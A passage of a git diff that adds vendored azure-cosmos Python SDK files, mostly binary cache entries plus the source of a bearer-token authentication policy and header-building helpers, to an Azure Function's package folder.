0000000..227ef7c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_cosmos_client_connection.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_default_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_default_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..3b81cda Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_default_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_endpoint_discovery_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_endpoint_discovery_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..93be53d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_endpoint_discovery_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_global_endpoint_manager.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_global_endpoint_manager.cpython-39.pyc new file mode 100644 index 0000000..3739fd9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_global_endpoint_manager.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_gone_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_gone_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..4beae8a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_gone_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_location_cache.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_location_cache.cpython-39.pyc new file mode 100644 index 0000000..a0f8a4b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_location_cache.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_partition.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_partition.cpython-39.pyc new file mode 100644 index 0000000..1e8e300 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_partition.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_query_iterable.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_query_iterable.cpython-39.pyc new file mode 100644 index 0000000..4f04adb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_query_iterable.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range.cpython-39.pyc new file mode 100644 index 0000000..98bb835 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range_partition_resolver.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range_partition_resolver.cpython-39.pyc new file mode 100644 index 0000000..36fff7b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range_partition_resolver.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_request_object.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_request_object.cpython-39.pyc new file mode 100644 index 0000000..ee1f072 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_request_object.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_resource_throttle_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_resource_throttle_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..5a5d0d1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_resource_throttle_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_options.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_options.cpython-39.pyc new file mode 100644 index 0000000..e4f8d65 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_options.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_utility.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_utility.cpython-39.pyc new file mode 100644 index 0000000..f71cad8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_utility.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_runtime_constants.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_runtime_constants.cpython-39.pyc new file mode 100644 index 0000000..da32a2f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_runtime_constants.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session.cpython-39.pyc new file mode 100644 index 0000000..6768f7a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..7c12d13 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_synchronized_request.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_synchronized_request.cpython-39.pyc new file mode 100644 index 0000000..50483b8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_synchronized_request.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_utils.cpython-39.pyc new file mode 100644 index 0000000..6595b06 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_vector_session_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_vector_session_token.cpython-39.pyc new file mode 100644 index 0000000..73976a0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_vector_session_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_version.cpython-39.pyc new file mode 100644 index 0000000..f4600bb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_version.cpython-39.pyc differ diff 
--git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/auth.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/auth.cpython-39.pyc new file mode 100644 index 0000000..8d3d258 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/auth.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/container.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/container.cpython-39.pyc new file mode 100644 index 0000000..1a2b8e7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/container.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/cosmos_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/cosmos_client.cpython-39.pyc new file mode 100644 index 0000000..8e27e11 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/cosmos_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/database.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/database.cpython-39.pyc new file mode 100644 index 0000000..777c31e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/database.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/diagnostics.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/diagnostics.cpython-39.pyc new file mode 100644 index 0000000..eb32405 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/diagnostics.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/documents.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/documents.cpython-39.pyc new file mode 100644 index 0000000..c6e9ac8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/documents.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/errors.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/errors.cpython-39.pyc new file mode 100644 index 0000000..24d0466 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/errors.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..6c0e5dd Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/http_constants.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/http_constants.cpython-39.pyc new file mode 100644 index 0000000..1da317c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/http_constants.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/offer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/offer.cpython-39.pyc new file mode 100644 index 0000000..94ed369 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/offer.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/partition_key.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/partition_key.cpython-39.pyc new file mode 100644 index 0000000..b035b41 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/partition_key.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/permission.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/permission.cpython-39.pyc new file mode 100644 index 0000000..d3bec62 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/permission.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/scripts.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/scripts.cpython-39.pyc new file mode 100644 index 0000000..857be6d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/scripts.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/user.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/user.cpython-39.pyc new file mode 100644 index 0000000..8203399 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/user.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_auth_policy.py 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_auth_policy.py new file mode 100644 index 0000000..0d2b7af --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_auth_policy.py @@ -0,0 +1,166 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See LICENSE.txt in the project root for +# license information. +# ------------------------------------------------------------------------- +import time + +from typing import Any, Dict, Optional +from azure.core.credentials import AccessToken +from azure.core.pipeline import PipelineRequest, PipelineResponse +from azure.core.pipeline.policies import HTTPPolicy +from azure.cosmos import http_constants + + +# pylint:disable=too-few-public-methods +class _CosmosBearerTokenCredentialPolicyBase(object): + """Base class for a Bearer Token Credential Policy. + + :param credential: The credential. + :type credential: ~azure.core.credentials.TokenCredential + :param str scopes: Lets you specify the type of access needed. + """ + + def __init__(self, credential, *scopes, **kwargs): # pylint:disable=unused-argument + # type: (TokenCredential, *str, **Any) -> None + super(_CosmosBearerTokenCredentialPolicyBase, self).__init__() + self._scopes = scopes + self._credential = credential + self._token = None # type: Optional[AccessToken] + + @staticmethod + def _enforce_https(request): + # type: (PipelineRequest) -> None + + # move 'enforce_https' from options to context so it persists + # across retries but isn't passed to a transport implementation + option = request.context.options.pop("enforce_https", None) + + # True is the default setting; we needn't preserve an explicit opt in to the default behavior + if option is False: + request.context["enforce_https"] = option + + enforce_https = request.context.get("enforce_https", True) + if enforce_https and not request.http_request.url.lower().startswith("https"): + raise ValueError( + "Bearer token authentication is not permitted for non-TLS protected (non-https) URLs." + ) + + @staticmethod + def _update_headers(headers, token): + # type: (Dict[str, str], str) -> None + """Updates the Authorization header with the bearer token. + This is the main method that differentiates this policy from core's BearerTokenCredentialPolicy and works + to properly sign the authorization header for Cosmos' REST API. For more information: + https://docs.microsoft.com/rest/api/cosmos-db/access-control-on-cosmosdb-resources#authorization-header + + :param dict headers: The HTTP Request headers + :param str token: The OAuth token. + """ + headers[http_constants.HttpHeaders.Authorization] = "type=aad&ver=1.0&sig={}".format(token) + + @property + def _need_new_token(self): + # type: () -> bool + return not self._token or self._token.expires_on - time.time() < 300 + + +class CosmosBearerTokenCredentialPolicy(_CosmosBearerTokenCredentialPolicyBase, HTTPPolicy): + """Adds a bearer token Authorization header to requests. + + :param credential: The credential. + :type credential: ~azure.core.TokenCredential + :param str scopes: Lets you specify the type of access needed. + :raises ValueError: If 'enforce_https' is enabled (the default) and the request URL is not HTTPS. + """ + + def on_request(self, request): + # type: (PipelineRequest) -> None + """Called before the policy sends a request.
+ + The base implementation authorizes the request with a bearer token. + + :param ~azure.core.pipeline.PipelineRequest request: the request + """ + self._enforce_https(request) + + if self._token is None or self._need_new_token: + self._token = self._credential.get_token(*self._scopes) + self._update_headers(request.http_request.headers, self._token.token) + + def authorize_request(self, request, *scopes, **kwargs): + # type: (PipelineRequest, *str, **Any) -> None + """Acquire a token from the credential and authorize the request with it. + + Keyword arguments are passed to the credential's get_token method. The token will be cached and used to + authorize future requests. + + :param ~azure.core.pipeline.PipelineRequest request: the request + :param str scopes: required scopes of authentication + """ + self._token = self._credential.get_token(*scopes, **kwargs) + self._update_headers(request.http_request.headers, self._token.token) + + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + """Authorize request with a bearer token and send it to the next policy + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + self.on_request(request) + try: + response = self.next.send(request) + self.on_response(request, response) + except Exception: # pylint:disable=broad-except + self.on_exception(request) + raise + else: + if response.http_response.status_code == 401: + self._token = None # any cached token is invalid + if "WWW-Authenticate" in response.http_response.headers: + request_authorized = self.on_challenge(request, response) + if request_authorized: + try: + response = self.next.send(request) + self.on_response(request, response) + except Exception: # pylint:disable=broad-except + self.on_exception(request) + raise + + return response + + def on_challenge(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> bool + """Authorize request according to an authentication challenge + + This method is called when the resource provider responds 401 with a WWW-Authenticate header. + + :param ~azure.core.pipeline.PipelineRequest request: the request which elicited an authentication challenge + :param ~azure.core.pipeline.PipelineResponse response: the resource provider's response + :returns: a bool indicating whether the policy should send the request + """ + # pylint:disable=unused-argument,no-self-use + return False + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> None + """Executed after the request comes back from the next policy. + + :param request: Request to be modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + def on_exception(self, request): + # type: (PipelineRequest) -> None + """Executed when an exception is raised while executing the next policy. + + This method is executed inside the exception handler. 
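The Cosmos-specific part of this policy is the signature format of the Authorization header; a direct check of the _update_headers staticmethod above (the token value is a placeholder, not a real credential):

headers = {}
_CosmosBearerTokenCredentialPolicyBase._update_headers(headers, "<oauth-token>")
assert headers[http_constants.HttpHeaders.Authorization] == "type=aad&ver=1.0&sig=<oauth-token>"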
+ + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + # pylint: disable=no-self-use,unused-argument + return diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_base.py new file mode 100644 index 0000000..28ad8d1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_base.py @@ -0,0 +1,675 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Base functions in the Azure Cosmos database service. +""" + +import base64 +import datetime +import json +import uuid +import binascii +from typing import Dict, Any + +from urllib.parse import quote as urllib_quote +from urllib.parse import urlsplit + +from azure.core import MatchConditions + +from . import auth +from . import documents +from . import partition_key +from . import http_constants +from . 
import _runtime_constants + +# pylint: disable=protected-access + +_COMMON_OPTIONS = { + 'initial_headers': 'initialHeaders', + 'pre_trigger_include': 'preTriggerInclude', + 'post_trigger_include': 'postTriggerInclude', + 'max_item_count': 'maxItemCount', + 'access_condition': 'accessCondition', + 'indexing_directive': 'indexingDirective', + 'consistency_level': 'consistencyLevel', + 'session_token': 'sessionToken', + 'enable_scan_in_query': 'enableScanInQuery', + 'resource_token_expiry_seconds': 'resourceTokenExpirySeconds', + 'offer_type': 'offerType', + 'offer_throughput': 'offerThroughput', + 'partition_key': 'partitionKey', + 'enable_cross_partition_query': 'enableCrossPartitionQuery', + 'populate_query_metrics': 'populateQueryMetrics', + 'enable_script_logging': 'enableScriptLogging', + 'offer_enable_ru_per_minute_throughput': 'offerEnableRUPerMinuteThroughput', + 'disable_ru_per_minute_usage': 'disableRUPerMinuteUsage', + 'change_feed': 'changeFeed', + 'continuation': 'continuation', + 'is_start_from_beginning': 'isStartFromBeginning', + 'populate_partition_key_range_statistics': 'populatePartitionKeyRangeStatistics', + 'populate_quota_info': 'populateQuotaInfo', + 'content_type': 'contentType', + 'is_query_plan_request': 'isQueryPlanRequest', + 'supported_query_features': 'supportedQueryFeatures', + 'query_version': 'queryVersion' +} + + +def _get_match_headers(kwargs): + # type: (Dict[str, Any]) -> Tuple[Optional[str], Optional[str]] + if_match = kwargs.pop('if_match', None) + if_none_match = kwargs.pop('if_none_match', None) + match_condition = kwargs.pop('match_condition', None) + if match_condition == MatchConditions.IfNotModified: + if_match = kwargs.pop('etag', None) + if not if_match: + raise ValueError("'match_condition' specified without 'etag'.") + elif match_condition == MatchConditions.IfPresent: + if_match = '*' + elif match_condition == MatchConditions.IfModified: + if_none_match = kwargs.pop('etag', None) + if not if_none_match: + raise ValueError("'match_condition' specified without 'etag'.") + elif match_condition == MatchConditions.IfMissing: + if_none_match = '*' + elif match_condition is None: + if 'etag' in kwargs: + raise ValueError("'etag' specified without 'match_condition'.") + else: + raise TypeError("Invalid match condition: {}".format(match_condition)) + return if_match, if_none_match + + +def build_options(kwargs): + # type: (Dict[str, Any]) -> Dict[str, Any] + options = kwargs.pop('request_options', kwargs.pop('feed_options', {})) + for key, value in _COMMON_OPTIONS.items(): + if key in kwargs: + options[value] = kwargs.pop(key) + + if_match, if_none_match = _get_match_headers(kwargs) + if if_match: + options['accessCondition'] = {'type': 'IfMatch', 'condition': if_match} + if if_none_match: + options['accessCondition'] = {'type': 'IfNoneMatch', 'condition': if_none_match} + return options + + +def GetHeaders( # pylint: disable=too-many-statements,too-many-branches + cosmos_client_connection, + default_headers, + verb, + path, + resource_id, + resource_type, + options, + partition_key_range_id=None, +): + """Gets HTTP request headers. + + :param _cosmos_client_connection.CosmosClientConnection cosmos_client_connection: + :param dict default_headers: + :param str verb: + :param str path: + :param str resource_id: + :param str resource_type: + :param dict options: + :param str partition_key_range_id: + :return: The HTTP request headers.
+ :rtype: dict + """ + headers = dict(default_headers) + options = options or {} + + if cosmos_client_connection._useMultipleWriteLocations: + headers[http_constants.HttpHeaders.AllowTentativeWrites] = "true" + + pre_trigger_include = options.get("preTriggerInclude") + if pre_trigger_include: + headers[http_constants.HttpHeaders.PreTriggerInclude] = ( + pre_trigger_include if isinstance(pre_trigger_include, str) else (",").join(pre_trigger_include) + ) + + post_trigger_include = options.get("postTriggerInclude") + if post_trigger_include: + headers[http_constants.HttpHeaders.PostTriggerInclude] = ( + post_trigger_include if isinstance(post_trigger_include, str) else (",").join(post_trigger_include) + ) + + if options.get("maxItemCount"): + headers[http_constants.HttpHeaders.PageSize] = options["maxItemCount"] + + access_condition = options.get("accessCondition") + if access_condition: + if access_condition["type"] == "IfMatch": + headers[http_constants.HttpHeaders.IfMatch] = access_condition["condition"] + else: + headers[http_constants.HttpHeaders.IfNoneMatch] = access_condition["condition"] + + if options.get("indexingDirective"): + headers[http_constants.HttpHeaders.IndexingDirective] = options["indexingDirective"] + + consistency_level = None + + # get default client consistency level + default_client_consistency_level = headers.get(http_constants.HttpHeaders.ConsistencyLevel) + + # set consistency level. check if set via options, this will override the default + if options.get("consistencyLevel"): + consistency_level = options["consistencyLevel"] + headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + elif default_client_consistency_level is not None: + consistency_level = default_client_consistency_level + headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + + # figure out if consistency level for this request is session + is_session_consistency = consistency_level == documents.ConsistencyLevel.Session + + # set session token if required + if is_session_consistency is True and not IsMasterResource(resource_type): + # if there is a token set via option, then use it to override default + if options.get("sessionToken"): + headers[http_constants.HttpHeaders.SessionToken] = options["sessionToken"] + else: + # check if the client's default consistency is session (and request consistency level is same), + # then update from session container + if default_client_consistency_level == documents.ConsistencyLevel.Session: + # populate session token from the client's session container + headers[http_constants.HttpHeaders.SessionToken] = cosmos_client_connection.session.get_session_token( + path + ) + + if options.get("enableScanInQuery"): + headers[http_constants.HttpHeaders.EnableScanInQuery] = options["enableScanInQuery"] + + if options.get("resourceTokenExpirySeconds"): + headers[http_constants.HttpHeaders.ResourceTokenExpiry] = options["resourceTokenExpirySeconds"] + + if options.get("offerType"): + headers[http_constants.HttpHeaders.OfferType] = options["offerType"] + + if options.get("offerThroughput"): + headers[http_constants.HttpHeaders.OfferThroughput] = options["offerThroughput"] + + if options.get("contentType"): + headers[http_constants.HttpHeaders.ContentType] = options['contentType'] + + if options.get("isQueryPlanRequest"): + headers[http_constants.HttpHeaders.IsQueryPlanRequest] = options['isQueryPlanRequest'] + + if options.get("supportedQueryFeatures"): + headers[http_constants.HttpHeaders.SupportedQueryFeatures] = 
options['supportedQueryFeatures'] + + if options.get("queryVersion"): + headers[http_constants.HttpHeaders.QueryVersion] = options['queryVersion'] + + if "partitionKey" in options: + # if partitionKey value is Undefined, serialize it as [{}] to be consistent with other SDKs. + if options.get("partitionKey") is partition_key._Undefined: + headers[http_constants.HttpHeaders.PartitionKey] = [{}] + # If partitionKey value is Empty, serialize it as [], which is the equivalent sent for migrated collections + elif options.get("partitionKey") is partition_key._Empty: + headers[http_constants.HttpHeaders.PartitionKey] = [] + # else serialize using json dumps method which apart from regular values will serialize None into null + else: + headers[http_constants.HttpHeaders.PartitionKey] = json.dumps([options["partitionKey"]]) + + if options.get("enableCrossPartitionQuery"): + headers[http_constants.HttpHeaders.EnableCrossPartitionQuery] = options["enableCrossPartitionQuery"] + + if options.get("populateQueryMetrics"): + headers[http_constants.HttpHeaders.PopulateQueryMetrics] = options["populateQueryMetrics"] + + if cosmos_client_connection.master_key: + headers[http_constants.HttpHeaders.XDate] = datetime.datetime.utcnow().strftime("%a, %d %b %Y %H:%M:%S GMT") + + if cosmos_client_connection.master_key or cosmos_client_connection.resource_tokens: + authorization = auth._get_authorization_header( + cosmos_client_connection, verb, path, resource_id, IsNameBased(resource_id), resource_type, headers + ) + # urllib.quote throws when the input parameter is None + if authorization: + # -_.!~*'() are valid characters in url, and shouldn't be quoted. + authorization = urllib_quote(authorization, "-_.!~*'()") + headers[http_constants.HttpHeaders.Authorization] = authorization + + if verb in ("post", "put"): + if not headers.get(http_constants.HttpHeaders.ContentType): + headers[http_constants.HttpHeaders.ContentType] = _runtime_constants.MediaTypes.Json + + if not headers.get(http_constants.HttpHeaders.Accept): + headers[http_constants.HttpHeaders.Accept] = _runtime_constants.MediaTypes.Json + + if partition_key_range_id is not None: + headers[http_constants.HttpHeaders.PartitionKeyRangeID] = partition_key_range_id + + if options.get("enableScriptLogging"): + headers[http_constants.HttpHeaders.EnableScriptLogging] = options["enableScriptLogging"] + + if options.get("offerEnableRUPerMinuteThroughput"): + headers[http_constants.HttpHeaders.OfferIsRUPerMinuteThroughputEnabled] = options[ + 